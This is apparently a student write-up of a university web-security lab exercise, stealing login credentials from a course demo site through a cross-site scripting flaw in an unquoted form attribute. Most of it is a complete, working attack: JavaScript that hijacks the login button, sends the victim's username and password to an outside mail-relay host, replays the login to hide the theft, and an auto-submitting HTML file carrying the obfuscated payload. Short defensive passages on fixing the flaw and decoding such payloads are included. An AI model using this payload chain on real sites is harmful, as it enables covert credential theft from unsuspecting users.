
Attack E: Password Theft

The final task of this project, or the “fun part”, is to steal someone’s password from the website. The user is initially not logged in to the website. The attacker creates an HTML file and sends it to the user to click on; the malicious HTML file redirects to the website, and the user unsuspectingly types in his username and password, only to have his login information sent to the attacker’s email when he presses the log in button. Of course, to avoid suspicion, the login needs to behave as normally as possible if he enters a legitimate username with the matching password.

1. Study the form

I know it’s cliché, but hey, that’s what you need to do first. So, let’s look at the source code of the login page just to make sure:

<div id="login">
 <form name=loginform method=POST action="
  <?php echo $_SERVER['PHP_SELF']?>">
  <table>
   <tr>
    <td>Username:</td>
    <td><input type=text name=login_username
      size=30 autocomplete=no value=<?php
      echo htmlspecialchars($_POST['login_username']); ?>></td>
   </tr>
   <tr>
    <td>Password:</td>
    <td colspan=2><input type=password name=login_password
      size=30 autocomplete=no>
      <input type=submit name=submit_login value="Log in">
      <input type=submit name=submit_registration value="Register">
    </td>
   </tr>
  </table>
 </form>
</div>
<div>
 <?php global $login_error; echo $login_error; ?>
</div>
<script>document.loginform.login_username.focus();</script>

Now, every time the user tries to log in to his account, the page queries the field, and when it doesn’t find the username, the username he previously entered is filtered by the htmlspecialchars() function and echoed back:

<input type=text name=login_username
      size=30 autocomplete=no value=<?php
      echo htmlspecialchars($_POST['login_username']); ?>>

See anything unusual? You guessed it: why do you do the filtering after the form has been sent? Now, if you don’t know what htmlspecialchars() does, it basically converts ', ", <, > into &#039;, &quot;, &lt;, &gt;. So we need to circumvent that with something else later on. Let’s see, what else can we do that will trigger the website to run a script without using the script tag? Ah, here’s a nice little function:

<script>document.loginform.login_username.focus();</script>

It seems the website is trying to create a friendly interface by automatically setting focus on the login username text field, so you don’t have to put your mouse on the login username text field to type your username. Thank you, web developers!

2. Exploit the onFocus

Since we discovered that the website uses the focus() function on the login username text field, we can use something like this as our username:

? onFocus=alert()

It’s a good thing that the value of the login username text field is not enclosed in quotes, so we can do this. So, every time the website gets the username field and echoes it back to the page, the input tag will look something like this:

<input type=text name=login_username
      size=30 autocomplete=no value=?
      onFocus=alert()>

And since the website uses the focus() function, the content of the onFocus attribute is triggered and hence executes the alert() function. Note: it seems that when you execute the alert() function, it goes into an infinite loop, so the website turned off the alert() function capability. However, you can still try it in your local browser to test whether your code works.
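To make the root cause of sections 1 and 2 concrete from the defender’s side, here is an added Python illustration (not code from the course site or from this post). It models the page’s template in both its vulnerable form (unquoted value attribute) and a hardened form (value in double quotes), feeds the `? onFocus=alert()` username through both, and checks the rendered tag for an injected event-handler attribute. The `htmlspecialchars` model mirrors PHP’s default behaviour as I understand it, and the helper names are my own.

```python
from html.parser import HTMLParser

# Added illustration (not the course site's code): a model of PHP's
# htmlspecialchars(). By default it escapes & < > and double quotes; the
# single quote is only escaped when the ENT_QUOTES flag is passed.
def htmlspecialchars(value: str, ent_quotes: bool = False) -> str:
    out = (value.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;"))
    if ent_quotes:
        out = out.replace("'", "&#039;")
    return out


def render_login_input(username: str, quote_attr: bool, ent_quotes: bool = False) -> str:
    """Render the login_username <input> the way the post's template does.

    quote_attr=False reproduces the vulnerable template, value=<?php ... ?>,
    quote_attr=True is the hardened form, value="<?php ... ?>".
    """
    escaped = htmlspecialchars(username, ent_quotes)
    value = f'"{escaped}"' if quote_attr else escaped
    return ("<input type=text name=login_username size=30 autocomplete=no "
            f"value={value}>")


class _HandlerFinder(HTMLParser):
    """Collect every on* attribute the browser would treat as an event handler."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name.lower()))


def injected_handlers(markup: str) -> list:
    """Return (tag, attribute) pairs for event handlers present in markup."""
    finder = _HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    payload = "? onFocus=alert()"   # the username used in the post
    for quoted in (False, True):
        tag = render_login_input(payload, quote_attr=quoted)
        print(f"quoted={quoted}: {tag}")
        print("   handlers:", injected_handlers(tag))
```

The check shows that escaping alone does not save an unquoted attribute: htmlspecialchars() leaves `?`, spaces and `=` untouched, so the browser reads onFocus as a second attribute. Quoting the attribute, i.e. value="<?php echo htmlspecialchars($_POST['login_username'], ENT_QUOTES, 'UTF-8'); ?>", turns the whole username into attribute text; ENT_QUOTES matters when a template uses single-quoted attributes. As defence in depth, serving the page with a Content-Security-Policy that omits 'unsafe-inline' blocks the injected handler too, at the price of the site’s own inline focus() script, which would have to move into an external file.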

3. Manipulate the login button

Now, we have to manipulate the behaviour of the login button so it sends what the user has entered in the form to the attacker’s email. In other words, we have to modify this input tag:

<input type=submit name=submit_login value="Log in">

So, let’s start cracking!

var mainForm = document.forms[0];
var button = mainForm.elements[2];
button.type='button';
button.addEventListener('click', function() {
},true);

The explanation of this code: you get the form that is inside the website. Since there is only one form, we just take the first one. Then, we get the third element that resides in that particular form (counting from 0), which is the submit_login button. Then we change the type of the submit_login button to “button” and add an event listener to the button so it listens for user clicks. Now we have successfully changed our button’s behaviour as desired.

4. Send the user input to the attackers email

Now, inside the event listener we have to put our code that gets the user inputs (username, password) and sends them by email to the attacker’s email.

var loginForm = document.forms[0];
var loginName = loginForm.elements[0].value;
var password = loginForm.elements[1].value;
javascript:void((new Image()).src=
   ('http://mail-infsec.cs.uni-saarland.de:8000/sendmail.php?' +
   'to=someone@stud.uni-saarland.de' + '&payload='+ loginName +
   ',' + password + '&random=' + Math.random()));

Again, we retrieve the first form and then get its first and second elements, which are the login name and the password. Then we execute our sendmail script, pointing to the attacker’s email.

5. Covering your tracks

Now, an elegant hacker needs to consider covering his tracks so the victim won’t get suspicious when he enters the correct username and password but nothing happens. So, add an XMLHttpRequest that does the usual authentication process below your malicious script:

var formEncode = function(args) {
 var output = '';
 for (var name in args) {
  if (output != '') {
   output += String.fromCharCode(38)
  }
  output += encodeURIComponent(name) + '=' +
     encodeURIComponent(args[name]);
 }
 return output;
}
loginForm.elements[2].type='submit';
var pay=new XMLHttpRequest();
pay.open('POST', '/index.php');
pay.setRequestHeader('Content-Type',
    'application/x-www-form-urlencoded');
pay.send(formEncode({login_username: loginName,
    password: password, submit_login: 'Log in'}));
window.location = "/index.php";

This function is pretty much the same as Attack D’s XMLHttpRequest(). It basically auto-submits the form to index.php by setting the variables to what the user entered. Now, you will get a seemingly ordinary login form, unless the user opens the source of the page.

6. Putting it all together

Now, you would say, how the hack would I fit this code into one continuous sentence in the onFocus value? If you have read Attack D: Profile Worm, then you would have guessed that we will be using the eval() and String.fromCharCode() functions. So far, you have this code:

var mainForm = document.forms[0];
var button = mainForm.elements[2];
button.type='button';
button.addEventListener('click', function() {
var loginForm = document.forms[0];
var loginName = loginForm.elements[0].value;
var password = loginForm.elements[1].value;
javascript:void((new Image()).src=
  ('http://mail-infsec.cs.uni-saarland.de:8000/sendmail.php?' +
  'to=s9sowind@stud.uni-saarland.de' + '&payload='+ loginName +
  ',' + password + '&random=' + Math.random()));
var formEncode = function(args) {
 var output = '';
 for (var name in args) {
  if (output != '') {
   output += String.fromCharCode(38)
  }
 output += encodeURIComponent(name) +
   '=' + encodeURIComponent(args[name]);
 }
 return output;
}
loginForm.elements[2].type='submit';
var pay=new XMLHttpRequest();
pay.open('POST', '/index.php');
pay.setRequestHeader('Content-Type',
  'application/x-www-form-urlencoded');
pay.send(formEncode({login_username: loginName,
  password: password, submit_login: 'Log in'}));
window.location = "/index.php";
},true);

Now, your next job is to find a good ASCII to Unicode converter website to convert all your code. The final touch is to construct an HTML file that submits the code beforehand and asks the user to type his username and password:

<!DOCTYPE html>
<html>
 <head>
 </head>
 <body onLoad = "breakthrough()">
  <form name=loginform method=POST action="/index.php">
   <input type=hidden name=login_username size=30 autocomplete=no
      value="? onFocus=eval(String.fromCharCode(118,97,114,32,109,
      97,105,110,70,111,114,109,32,61,32,100,111,99,117,109,101,110,
      116,46,102,111,114,109,115,91,48,93,59,10,118,97,114,32,98,117,
      116,116,111,110,32,61,32,109,97,105,110,70,111,114,109,46,101,
      108,101,109,101,110,116,115,91,50,93,59,10,98,117,116,116,111,
      110,46,116,121,112,101,61,39,98,117,116,116,111,110,39,59,10,98,
      117,116,116,111,110,46,97,100,100,69,118,101,110,116,76,105,115,
      116,101,110,101,114,40,39,99,108,105,99,107,39,44,32,102,117,110,
      99,116,105,111,110,40,41,32,123,10,118,97,114,32,108,111,103,105,
      110,70,111,114,109,32,61,32,100,111,99,117,109,101,110,116,46,102,
      111,114,109,115,91,48,93,59,10,118,97,114,32,108,111,103,105,110,
      78,97,109,101,32,61,32,108,111,103,105,110,70,111,114,109,46,101,
      108,101,109,101,110,116,115,91,48,93,46,118,97,108,117,101,59,10,
      118,97,114,32,112,97,115,115,119,111,114,100,32,61,32,108,111,103,
      105,110,70,111,114,109,46,101,108,101,109,101,110,116,115,91,49,93,
      46,118,97,108,117,101,59,10,106,97,118,97,115,99,114,105,112,116,58,
      118,111,105,100,40,40,110,101,119,32,73,109,97,103,101,40,41,41,46,
      115,114,99,61,40,39,104,116,116,112,58,47,47,109,97,105,108,45,
      105,110,102,115,101,99,46,99,115,46,117,110,105,45,115,97,97,114,
      108,97,110,100,46,100,101,58,56,48,48,48,47,115,101,110,100,109,
      97,105,108,46,112,104,112,63,39,32,43,32,39,116,111,61,115,57,115,
      111,119,105,110,100,64,115,116,117,100,46,117,110,105,45,115,97,97,
      114,108,97,110,100,46,100,101,39,32,43,32,39,38,112,97,121,108,111,
      97,100,61,39,43,32,108,111,103,105,110,78,97,109,101,32,43,32,39,44,
      39,32,43,32,112,97,115,115,119,111,114,100,32,43,32,39,38,114,97,110,
      100,111,109,61,39,32,43,32,77,97,116,104,46,114,97,110,100,111,109,40,41,
      41,41,59,10,118,97,114,32,102,111,114,109,69,110,99,111,100,101,32,61,
      32,102,117,110,99,116,105,111,110,40,97,114,103,115,41,32,123,10,118,97,
      114,32,111,117,116,112,117,116,32,61,32,39,39,59,10,102,111,114,32,40,118,
      97,114,32,110,97,109,101,32,105,110,32,97,114,103,115,41,32,123,10,105,
      102,32,40,111,117,116,112,117,116,32,33,61,32,39,39,41,32,123,32,111,117,
      116,112,117,116,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,
      104,97,114,67,111,100,101,40,51,56,41,32,125,10,111,117,116,112,117,116,32,
      43,61,32,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,
      116,40,110,97,109,101,41,32,43,32,39,61,39,32,43,32,101,110,99,111,100,
      101,85,82,73,67,111,109,112,111,110,101,110,116,40,97,114,103,115,91,
      110,97,109,101,93,41,59,10,125,10,114,101,116,117,114,110,32,111,117,
      116,112,117,116,59,10,125,10,108,111,103,105,110,70,111,114,109,46,101,
      108,101,109,101,110,116,115,91,50,93,46,116,121,112,101,61,39,115,
      117,98,109,105,116,39,59,10,118,97,114,32,112,97,121,61,110,101,119,
      32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,10,112,
      97,121,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,
      112,58,47,47,119,119,119,46,105,110,102,115,101,99,46,99,115,46,
      117,110,105,45,115,97,97,114,108,97,110,100,46,100,101,47,116,101,97,
      99,104,105,110,103,47,49,48,87,83,47,83,101,99,117,114,105,116,121,
      47,109,97,116,101,114,105,97,108,47,112,114,111,106,101,99,116,115,47,
      112,114,111,106,101,99,116,50,47,112,101,97,110,117,116,47,105,110,
      100,101,120,46,112,104,112,39,41,59,10,112,97,121,46,115,101,116,82,
      101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,
      101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,
      116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,
      108,101,110,99,111,100,101,100,39,41,59,10,112,97,121,46,115,101,110,
      100,40,102,111,114,109,69,110,99,111,100,101,40,123,108,111,103,105,
      110,95,117,115,101,114,110,97,109,101,58,32,108,111,103,105,110,78,97,
      109,101,44,32,112,97,115,115,119,111,114,100,58,32,112,97,115,115,
      119,111,114,100,44,32,115,117,98,109,105,116,95,108,111,103,105,110,
      58,32,39,76,111,103,32,105,110,39,125,41,41,59,10,119,105,110,100,111,
      119,46,108,111,99,97,116,105,111,110,32,61,32,34,104,116,116,
      112,58,47,47,119,119,119,46,105,110,102,115,101,99,46,99,115,
      46,117,110,105,45,115,97,97,114,108,97,110,100,46,100,101,47,
      116,101,97,99,104,105,110,103,47,49,48,87,83,47,83,101,99,
      117,114,105,116,121,47,109,97,116,101,114,105,97,108,47,112,
      114,111,106,101,99,116,115,47,112,114,111,106,101,99,116,50,47,
      112,101,97,110,117,116,47,105,110,100,101,120,46,112,104,
      112,34,59,10,125,44,116,114,117,101,41,59))">
   <script type="text/javascript">
    function breakthrough() {
     document.loginform.submit();
    }
   </script>
  </form>
 </body>
</html>
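For an analyst who finds a request like the one above in a web-server log or proxy capture, the useful move is to decode the String.fromCharCode() blob and look for the same building blocks the post assembles (eval, an on* handler, document.forms, new Image(), XMLHttpRequest, window.location). The following Python is an added example of such a triage helper, not part of the original post or the course material; the sample input is constructed from the first statement of the post’s encoded payload, and the indicator list is my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample input: the onFocus attribute as the post builds it, but
# carrying only the char codes of the payload's first statement
# ("var mainForm = document.forms[0];") so the example stays short.
SAMPLE_FIELD = (
    "? onFocus=eval(String.fromCharCode(118,97,114,32,109,97,105,110,70,111,"
    "114,109,32,61,32,100,111,99,117,109,101,110,116,46,102,111,114,109,"
    "115,91,48,93,59))"
)

# Matches the argument list of String.fromCharCode(...), including the
# multi-line, whitespace-padded form seen in the post's HTML file.
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)", re.IGNORECASE)

# Indicators are the building blocks this post's payload is assembled from
# (my own list; extend it for other campaigns).
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "event_handler_attr": re.compile(r"\bon\w+\s*=", re.IGNORECASE),
    "form_access": re.compile(r"document\.forms\b"),
    "image_beacon": re.compile(r"new\s+Image\s*\(\s*\)"),
    "xhr": re.compile(r"\bXMLHttpRequest\b"),
    "redirect": re.compile(r"window\.location\b"),
}


def decode_fromcharcode(text: str) -> list:
    """Decode every String.fromCharCode(...) argument list found in text."""
    decoded = []
    for match in _FROMCHARCODE.finditer(text):
        codes = [int(tok) for tok in match.group(1).split(",") if tok.strip()]
        decoded.append("".join(chr(code) for code in codes))
    return decoded


def triage(raw_field_value: str) -> dict:
    """Decode a submitted login_username value and list the indicators it contains.

    raw_field_value may still be URL-encoded, as it appears in a request log.
    """
    text = unquote_plus(raw_field_value)
    decoded = decode_fromcharcode(text)
    # Search both the outer attribute text and the decoded script, since the
    # eval()/onFocus part sits outside the encoded blob.
    haystack = "\n".join([text, *decoded])
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    result = triage(SAMPLE_FIELD)
    for stmt in result["decoded"]:
        print("decoded:", stmt)
    print("indicators:", ", ".join(result["indicators"]) or "none")
```

Run against the full blob from the HTML file above, the decoder returns the whole listing from section 6, so the exfiltration address and the auto-login request become readable without executing anything; feeding a benign username such as alice returns no indicators.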